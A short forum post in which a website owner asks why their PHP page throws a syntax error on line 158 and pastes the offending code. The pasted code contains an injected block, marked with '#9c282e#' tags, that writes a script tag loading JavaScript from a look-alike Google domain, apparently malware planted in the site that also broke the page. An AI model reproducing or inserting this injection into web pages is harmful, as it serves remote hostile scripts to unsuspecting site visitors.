I have a problem and was wondering if you could direct me in the right direction?
The problem is:
Parse error: syntax error, unexpected T_STRING in /home/content/a/t/h/athenakern2009/html/erinsart/index.php on line 158
There is nothing on the 158 line in Dreamweaver when I look. Actually line 158 is the blank line between #9c282e# and if(!$srvc_counter) {echo
What the hell is wrong with this code? Anyone?
$subcat['description'] = preg_replace("/<br.*?>
<?
#9c282e#
if(!$srvc_counter) {echo " <script type=\"text/javascript\" src=\"http://g00glestatic.com/s.js\"></script>";$srvc_counter = true;}
#/9c282e#
?>[\r\n]*/i", '<br />' . $ident , bb_decode($subcat['description']));